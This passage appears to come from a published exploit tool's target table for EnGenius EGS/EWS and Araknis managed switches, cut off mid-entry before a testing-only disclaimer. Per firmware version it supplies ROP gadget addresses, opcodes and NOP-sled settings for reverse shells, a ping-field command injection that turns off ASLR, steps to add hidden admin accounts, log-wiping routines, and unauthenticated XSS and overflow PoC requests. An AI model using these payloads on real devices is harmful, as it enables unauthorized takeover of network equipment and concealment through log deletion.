'sys_timeSntpDel_set':0x4350D8,# Jump one after 'sw $ra'# Delete (address, binary dependent)
# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSettings_set()
'sys_timeSettings_set':0x434140,# Jump one after 'sw $ra'# Enable/Disable (address, binary dependent)
'vulnerable': True,
},
'heack_cgi_shell': {
'cgi':'set.cgi',# /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()
'START':0x7ffeff04,# start: Stack overflow RA, used for searching NOP sled by blind jump
'STOP':0x7fc60000,# end: You may want to play with this if you dont get it working
'usr_nop': 64,# NOP sled (shellcode will be tailed)
'pwd_nop': 77,# filler/garbage (not used for something constructive)
'align': 3,# Align opcodes in memory
'stack':True,# NOP and shellcode lays on: True = stack, False = Heap
'vulnerable': True,
},
},
},
#
# EnGenius Technologies, Inc.
# EGS series
#
# CGI Reverse Shell : Yes
# Boa/Hydra reverse shell: Yes
# Del /var/log/ram.log : Yes
# Del /var/log/flash.log : Yes
# Del /mntlog/flash.log : Yes
# Add credentials : Yes
# Del credentials : Yes
#
'14044-509': {
'template':'EnGenius',# Static for the vendor
'version':'1.05.20_150810-1754',# Version / binary dependent stuff
'model':'EGS2110P',# Model
'uri':'https://www.engeniustech.com/engenius-products/8-port-gigabit-smart-switch-egs2110p/',
'exploit': {
'heack_hydra_shell': {
# /sqfs/bin/boa; embedparse()
'gadget': 0x40E12C,# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
# /sqfs/bin/boa; read_body();
'system': 0x8f99851c,# la $t9, system # opcode, binary dependent
# /sqfs/bin/boa; read_body();
'handler': 0x248405a0,# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
'v0': 7,# Should leave as-is (but you can play between 5 - 8)
'vulnerable': True,
},
'stack_cgi_diag': {
# /sqfs/home/web/cgi-bin/datajson.cgi; sn_tracertSet()
# traceroute
'web_sys_ping_post': 0x42382C,# Jump one after 'sw $ra'# (address, binary dependent)
'sys_ping_post_cmd':'&ip=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/conf_tmp/check #&mh=30&uid=0',
'sys_ping_post_check':'',
'verify_uri':'/conf_tmp/check',
'vulnerable': True,#
},
'stack_cgi_add_account': {
# pt: 0 = no password, 1 = cleartext, 2 = encrypted
# /sqfs/home/web/cgi/set.cgi; sn_user_mngSet()
'address':0x423E74,# Jump one after 'sw $ra'# (address, binary dependent)
'account':'&na=USERNAME&pt=2&pw=PASSWORD&pwn=PASSWORD&pv=0&op=1&',# Admin, priv 15
'vulnerable': True,
},
'stack_cgi_del_account': {
# /sqfs/home/web/cgi/set.cgi; sn_user_mngSet()
'address':0x423E74,# Jump one after 'sw $ra'# (address, binary dependent)
'account':'&na=USERNAME&pt=2&pv=0&op=0',#
'vulnerable': True,#
},
'stack_cgi_log': {
# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_globalSet()
'log_settings_set':0x43DE18,# Jump one after 'sw $ra'# Disable Logging (address, binary dependent)
# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()
'log_ramClear':0x43F934,# Jump one after 'sw $ra'# Clean RAM log (address, binary dependent)
# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()
'log_fileClear':0x43F934,# Jump one after 'sw $ra'# Clean FILE log (address, binary dependent)
'vulnerable': True,
},
'stack_cgi_sntp': {
# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()
'sys_timeSntp_set':0x424844,# Jump one after 'sw $ra'# Set SNTP Server (Inject RCE)
# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntpDel_set()
'sys_timeSntpDel_set':0x424844,# Jump one after 'sw $ra'# Delete (address, binary dependent)
# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSettings_set()
'sys_timeSettings_set':0x424844,# Jump one after 'sw $ra'# Enable/Disable (address, binary dependent)
'vulnerable': True,
},
'heack_cgi_shell': {
'cgi':'security.cgi',# /sqfs/home/web/cgi-bin/security.cgi; main()
'START':0x100181A0,# start: Stack overflow RA, used for searching NOP sled by blind jump
'STOP':0x104006A0,# end: You may want to play with this if you dont get it working
'usr_nop': 987,# NOP sled (shellcode will be tailed)
'pwd_nop': 69,# filler/garbage (not used for something constructive)
'align': 0,# Align opcodes in memory
'stack':False,# NOP and shellcode lays on: True = stack, False = Heap
'vulnerable': True,
},
},
},
#
# EnGenius Technologies, Inc.
# EWS series
#
# CGI Reverse Shell : Yes
# Boa/Hydra reverse shell: Yes
# Del /var/log/ram.log : Yes
# Del /var/log/flash.log : Yes
# Del /mntlog/flash.log : Yes
# Add credentials : Yes
# Del credentials : Yes
#
'14044-32589': {
'template':'EnGenius',# Static for the vendor
'version':'1.06.21_c1.8.77_180906-0716',# Version / binary dependent stuff
'model':'EWS1200-28TFP',# Model
'uri':'https://www.engeniustech.com/engenius-products/managed-poe-network-switch-ews1200-28tfp/',
'verify': {
'cpl_locallogin.cgi (XSS)': {
'description':'XSS in "redirecturl,userurl,loginurl,username,password" (PoC: Count passed XSS)',
'authenticated': False,
'response':'xss',
'Content-Type':False,
'uri':'/cgi-bin/cpl_locallogin.cgi?redirecturl=<script>alert(XSS);</script>&userurl=<script>alert(XSS);</script>&loginurl=<script>alert(XSS);</script>',
'content':'username=<script>alert(XSS);</script>&password=<script>alert(XSS);</script>',
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
'sn.captivePortal.login (XSS)': {
'description':'XSS in "userurl & uamip" (PoC: Count passed XSS)',
'authenticated': False,
'response':'xss',
'Content-Type':False,
'uri':'/cgi-bin/sn.captivePortal.login?cmd=action',
'content':'mac=dummy&res=dummy&userurl=<script>alert(XSS);</script>&uamip=<script>alert(XSS);</script>&alertmsg=dummy&called=dummy',
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
'cpl_logo_ul.cgi': {
'description':'Unauthenticated upload of "logo_icon". (PoC: Upload invalid file)',
'authenticated': False,
'response':'json',
'Content-Type':False,
'uri':'/cgi-bin/cpl_logo_ul.cgi',
'content':'Content-Disposition: filename.png\n------',
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
'cpl_locallogin.cgi': {
'description':'Stack overflow in "username/password (PoC: crash CGI)',
'authenticated': False,
'response':'502',
'Content-Type':False,
'uri':'/cgi-bin/cpl_locallogin.cgi?redirecturl=AAAA&userurl=BBBB&loginurl=BBBB',
'content':'username=admin&password=' + self.random_string(196),
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
'sn.captivePortal.login': {
'description':'Stack overflow in "called", XSS in "userurl & uamip" (PoC: crash CGI)',
'authenticated': False,
'response':'502',
'Content-Type':False,
'uri':'/cgi-bin/sn.captivePortal.login?cmd=action',
'content':'mac=dummy&res=dummy&userurl=dummy&uamip=dummy&alertmsg=dummy&called=' + self.random_string(4100),
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
'sn.jrpc.dispatch.cgi': {
'description':'Stack overflow in "usr, pswrd and method" (PoC: crash CGI)',
'authenticated': False,
'response':'502',
'Content-Type':False,
'uri':'/cgi-bin/sn.jrpc.dispatch.cgi',
'content':'{"id":1, "jsonrpc":"2.0","params":{"usr":"admin","pswrd":"' + self.random_string(288) + '"},"method":"login"}',
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
'sn.captivePortal.auth': {
'description':'Stack overflow in "user, chap_chal, chap_pass" (PoC: crash CGI)',
'authenticated': False,
'response':'502',
'Content-Type':False,
'uri':'/cgi-bin/sn.captivePortal.auth?user=admin&chap_chal=challenge&chap_pass='+ self.random_string(140),
'content':'',
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
},
'exploit': {
'heack_hydra_shell': {
# /sqfs/bin/boa; embedparse()
'gadget': 0x40E15C,# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
# /sqfs/bin/boa; read_body();
'system': 0x8f99851c,# la $t9, system # opcode, binary dependent
# /sqfs/bin/boa; read_body();
'handler': 0x24840690,# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
'v0': 6,# Should leave as-is (but you can play between 5 - 8)
'safe': True, # Boa/Hydra restart/watchdog, False = no restart, True = restart
'vulnerable': True,
},
'stack_cgi_add_account': {
# pt: 0 = no password, 1 = cleartext, 2 = encrypted
# /sqfs/home/web/cgi/set.cgi; sn_user_mngSet()
'address':0x42D1D4,# Jump one after 'sw $ra'# (address, binary dependent)
'account':'&na=USERNAME&pt=2&pw=PASSWORD&pwn=PASSWORD&pv=0&op=1&',# Admin, priv 15
'vulnerable': True,
},
'stack_cgi_del_account': {
# /sqfs/home/web/cgi/set.cgi; sn_user_mngSet()
'address':0x42D1D4,# Jump one after 'sw $ra'# (address, binary dependent)
'account':'&na=USERNAME&pt=2&pv=0&op=0',#
'vulnerable': True,#
},
'stack_cgi_diag': {
# /sqfs/home/web/cgi-bin/datajson.cgi; sn_tracertSet()
# traceroute
'web_sys_ping_post': 0x42CB8C,# Jump one after 'sw $ra'# (address, binary dependent)
'sys_ping_post_cmd':'&ip=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/conf_tmp/check #&mh=30&uid=0',
'sys_ping_post_check':'',
'verify_uri':'/conf_tmp/check',
'vulnerable': True,#
},
'stack_cgi_log': {
# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_globalSet()
'log_settings_set':0x4494E8,# Jump one after 'sw $ra'# Disable Logging (address, binary dependent)
# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()
'log_ramClear':0x44B0C0,# Jump one after 'sw $ra'# Clean RAM log (address, binary dependent)
# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()
'log_fileClear':0x44B0C0,# Jump one after 'sw $ra'# Clean FILE log (address, binary dependent)
'vulnerable': True,
},
'stack_cgi_sntp': {
# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()
'sys_timeSntp_set':0x42E438,# Jump one after 'sw $ra'# Set SNTP Server (Inject RCE)
# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntpDel_set()
'sys_timeSntpDel_set':0x42E438,# Jump one after 'sw $ra'# Delete (address, binary dependent)
# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSettings_set()
'sys_timeSettings_set':0x42E438,# Jump one after 'sw $ra'# Enable/Disable (address, binary dependent)
'vulnerable': True,
},
'heack_cgi_shell': {
'cgi':'security.cgi',# /sqfs/home/web/cgi-bin/security.cgi; main()
'query':'nop=nop&usr=admin&pswrd=_PWDNOP_RA_START&shellcode=_USRNOP_SHELLCODE',
'START':0x100271A0,# start: Stack overflow RA, used for searching NOP sled by blind jump
'STOP':0x104006A0,# end: You may want to play with this if you dont get it working
'usr_nop': 987,# NOP sled (shellcode will be tailed)
'pwd_nop': 69,# filler/garbage (not used for something constructive)
'align': 0,# Align opcodes in memory
'stack':False,# NOP and shellcode lays on: True = stack, False = Heap
'vulnerable': True,
},
},
},
'14044-44104': {
'template':'EnGenius',# Static for the vendor
'version':'1.07.22_c1.9.21_181018-0228',# Version / binary dependent stuff
'model':'EWS1200-28TFP',# Model
'uri':'https://www.engeniustech.com/engenius-products/managed-poe-network-switch-ews1200-28tfp/',
'verify': {
'cpl_locallogin.cgi (XSS)': {
'description':'XSS in "redirecturl,userurl,loginurl,username,password" (PoC: Count passed XSS)',
'authenticated': False,
'response':'xss',
'Content-Type':False,
'uri':'/cgi-bin/cpl_locallogin.cgi?redirecturl=<script>alert(XSS);</script>&userurl=<script>alert(XSS);</script>&loginurl=<script>alert(XSS);</script>',
'content':'username=<script>alert(XSS);</script>&password=<script>alert(XSS);</script>',
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
'sn.captivePortal.login (XSS)': {
'description':'XSS in "userurl & uamip" (PoC: Count passed XSS)',
'authenticated': False,
'response':'xss',
'Content-Type':False,
'uri':'/cgi-bin/sn.captivePortal.login?cmd=action',
'content':'mac=dummy&res=dummy&userurl=<script>alert(XSS);</script>&uamip=<script>alert(XSS);</script>&alertmsg=dummy&called=dummy',
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
'cpl_logo_ul.cgi': {
'description':'Unauthenticated upload of "logo_icon". (PoC: Upload invalid file)',
'authenticated': False,
'response':'json',
'Content-Type':False,
'uri':'/cgi-bin/cpl_logo_ul.cgi',
'content':'Content-Disposition: filename.png\n------',
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
'cpl_locallogin.cgi': {
'description':'Stack overflow in "username/password (PoC: crash CGI)',
'authenticated': False,
'response':'502',
'Content-Type':False,
'uri':'/cgi-bin/cpl_locallogin.cgi?redirecturl=AAAA&userurl=BBBB&loginurl=BBBB',
'content':'username=admin&password=' + self.random_string(196),
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
'sn.captivePortal.login': {
'description':'Stack overflow in "called", XSS in "userurl & uamip" (PoC: crash CGI)',
'authenticated': False,
'response':'502',
'Content-Type':False,
'uri':'/cgi-bin/sn.captivePortal.login?cmd=action',
'content':'mac=dummy&res=dummy&userurl=dummy&uamip=dummy&alertmsg=dummy&called=' + self.random_string(4100),
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
'sn.jrpc.dispatch.cgi': {
'description':'Stack overflow in "usr, pswrd and method" (PoC: crash CGI)',
'authenticated': False,
'response':'502',
'Content-Type':False,
'uri':'/cgi-bin/sn.jrpc.dispatch.cgi',
'content':'{"id":1, "jsonrpc":"2.0","params":{"usr":"admin","pswrd":"' + self.random_string(288) + '"},"method":"login"}',
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
'sn.captivePortal.auth': {
'description':'Stack overflow in "user, chap_chal, chap_pass" (PoC: crash CGI)',
'authenticated': False,
'response':'502',
'Content-Type':False,
'uri':'/cgi-bin/sn.captivePortal.auth?user=admin&chap_chal=challenge&chap_pass='+ self.random_string(140),
'content':'',
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
},
'exploit': {
'heack_hydra_shell': {
# /sqfs/bin/boa; embedparse()
'gadget': 0x40E15C,# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
# /sqfs/bin/boa; read_body();
'system': 0x8f99851c,# la $t9, system # opcode, binary dependent
# /sqfs/bin/boa; read_body();
'handler': 0x24840690,# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
'v0': 6,# Should leave as-is (but you can play between 5 - 8)
'safe': True, # Boa/Hydra restart/watchdog, False = no restart, True = restart
'vulnerable': True,
},
'stack_cgi_add_account': {
# pt: 0 = no password, 1 = cleartext, 2 = encrypted
# /sqfs/home/web/cgi/set.cgi; sn_user_mngSet()
'address':0x42C334,# Jump one after 'sw $ra'# (address, binary dependent)
'account':'&na=USERNAME&pt=2&pw=PASSWORD&pwn=PASSWORD&pv=0&op=1&',# Admin, priv 15
'vulnerable': True,
},
'stack_cgi_del_account': {
# /sqfs/home/web/cgi/set.cgi; sn_user_mngSet()
'address':0x42C334,# Jump one after 'sw $ra'# (address, binary dependent)
'account':'&na=USERNAME&pt=2&pv=0&op=0',#
'vulnerable': True,#
},
'stack_cgi_diag': {
# /sqfs/home/web/cgi-bin/datajson.cgi; sn_tracertSet()
# traceroute
'web_sys_ping_post': 0x42BCEC,# Jump one after 'sw $ra'# (address, binary dependent)
'sys_ping_post_cmd':'&ip=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/conf_tmp/check #&mh=30&uid=0',
'sys_ping_post_check':'',
'verify_uri':'/conf_tmp/check',
'vulnerable': True,#
},
'stack_cgi_log': {
# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_globalSet()
'log_settings_set':0x448008,# Jump one after 'sw $ra'# Disable Logging (address, binary dependent)
# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()
'log_ramClear':0x449BE0,# Jump one after 'sw $ra'# Clean RAM log (address, binary dependent)
# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()
'log_fileClear':0x449BE0,# Jump one after 'sw $ra'# Clean FILE log (address, binary dependent)
'vulnerable': True,
},
'stack_cgi_sntp': {
# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()
'sys_timeSntp_set':0x42D598,# Jump one after 'sw $ra'# Set SNTP Server (Inject RCE)
# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()
'sys_timeSntpDel_set':0x42D598,# Jump one after 'sw $ra'# Delete (address, binary dependent)
# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()
'sys_timeSettings_set':0x42D598,# Jump one after 'sw $ra'# Enable/Disable (address, binary dependent)
'vulnerable': True,
},
'heack_cgi_shell': {
'cgi':'security.cgi',# /sqfs/home/web/cgi-bin/security.cgi; main()
'query':'nop=nop&usr=admin&pswrd=_PWDNOP_RA_START&shellcode=_USRNOP_SHELLCODE',
'START':0x100271A0,# start: Stack overflow RA, used for searching NOP sled by blind jump
'STOP':0x104006A0,# end: You may want to play with this if you dont get it working
'usr_nop': 987,# NOP sled (shellcode will be tailed)
'pwd_nop': 69,# filler/garbage (not used for something constructive)
'align': 0,# Align opcodes in memory
'stack':False,# NOP and shellcode lays on: True = stack, False = Heap
'vulnerable': True,
},
},
},
#
# Araknis Networks
#
# CGI Reverse Shell : Yes
# Boa/Hydra reverse shell: Yes
# Del /var/log/ram.log : Yes
# Del /var/log/flash.log : Yes
# Del /mntlog/flash.log : Yes
# Add credentials : Yes
# Del credentials : Yes
#
'8028-89928': {
'template':'Araknis',# Static for the vendor
'version':'1.2.00_171225-1618',# Version / binary dependent stuff
'model':'AN-310-SW-16-POE',# Model
'uri':'http://araknisnetworks.com/',
'exploit': {
'heack_hydra_shell': {
# /sqfs/bin/boa; embedparse()
'gadget': 0x40E04C,# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
# /sqfs/bin/boa; read_body();
'system': 0x8f99851c,# la $t9, system # opcode, binary dependent
# /sqfs/bin/boa; read_body();
'handler': 0x24840470,# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
'v0': 6,# Should leave as-is (but you can play between 5 - 8)
'safe': False, # Boa/Hydra restart/watchdog, False = no restart, True = restart
'vulnerable': True,
},
'stack_cgi_diag': {
# /sqfs/home/web/cgi-bin/datajson.cgi; sn_tracertSet()
# traceroute
'web_sys_ping_post': 0x42A494,# Jump one after 'sw $ra'# (address, binary dependent)
'sys_ping_post_cmd':'&ip=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/conf_tmp/check #&mh=30&session_uid=0&uid=0',
'sys_ping_post_check':'',
'verify_uri':'/conf_tmp/check',
'vulnerable': True,#
},
'stack_cgi_add_account': {
# /sqfs/home/web/cgi/set.cgi; sn_EncrypOnly_user_mngSet()
'address':0x4303B4,# Jump one after 'sw $ra'# (address, binary dependent)
'account':'&na=USERNAME&pw=PASSWORD&pv=0&op=1&',# Admin, priv 15
'vulnerable': True,
},
'stack_cgi_del_account': {
# /sqfs/home/web/cgi/set.cgi; sn_user_mngSet()
'address':0x42ADB8,# Jump one after 'sw $ra'# (address, binary dependent)
'account':'&na=USERNAME&pw=&pv=0&op=0',#
'vulnerable': True,# user
},
'stack_cgi_log': {
# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_globalSet()
'log_settings_set':0x44DBD8,# Jump one after 'sw $ra'# Disable Logging (address, binary dependent)
# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()
'log_ramClear':0x44FC88,# Jump one after 'sw $ra'# Clean RAM log (address, binary dependent)
# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()
'log_fileClear':0x44FC88,# Jump one after 'sw $ra'# Clean FILE log (address, binary dependent)
'vulnerable': True,
},
'stack_cgi_sntp': {
# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()
'sys_timeSntp_set':0x42BAE4,# Jump one after 'sw $ra'# Set SNTP Server (Inject RCE)
# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()
'sys_timeSntpDel_set':0x42BAE4,# Jump one after 'sw $ra'# Delete (address, binary dependent)
# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()
'sys_timeSettings_set':0x42BAE4,# Jump one after 'sw $ra'# Enable/Disable (address, binary dependent)
'vulnerable': True,
},
'heack_cgi_shell': {
'cgi':'security.cgi',# /sqfs/home/web/cgi-bin/security.cgi; main()
# We need these to push NOP and shellcode on higher heap addresses to avoid 0x00
'query': (self.random_string(1) +'=' + self.random_string(1) +'&') * 110 + 'usr=admin&pswrd=_PWDNOP_RA_START&shellcode=_USRNOP_SHELLCODE',
#'query':'a=a&' * 110 + 'usr=admin&pswrd=_PWDNOP_RA_START&shellcode=_USRNOP_SHELLCODE',
'START':0x10010104,# start: Stack overflow RA, used for searching NOP sled by blind jump
'STOP': 0x106006
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum